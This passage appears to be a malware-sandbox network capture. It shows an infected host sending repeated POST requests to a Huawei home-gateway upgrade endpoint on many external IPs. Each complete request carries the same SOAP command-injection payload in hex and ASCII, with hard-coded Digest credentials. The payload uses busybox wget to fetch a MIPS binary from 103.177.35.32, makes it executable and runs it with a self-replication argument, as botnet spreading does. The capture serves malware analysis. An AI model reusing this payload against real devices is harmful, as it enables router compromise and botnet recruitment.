                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1421192.168.2.2337958157.221.30.5337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536550999 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1422192.168.2.2351636197.135.230.10537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536552906 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1423192.168.2.235198641.63.69.16137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536559105 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1424192.168.2.2357744197.189.113.4337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536567926 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1425192.168.2.233653465.198.105.19937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536569118 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1426192.168.2.2352000124.246.12.11137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536567926 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1427192.168.2.2345126197.27.244.16037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536590099 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1428192.168.2.233802241.56.244.11037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536597967 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1429192.168.2.2349154157.178.149.23437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536597967 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1430192.168.2.2360888157.29.219.2137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536612988 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
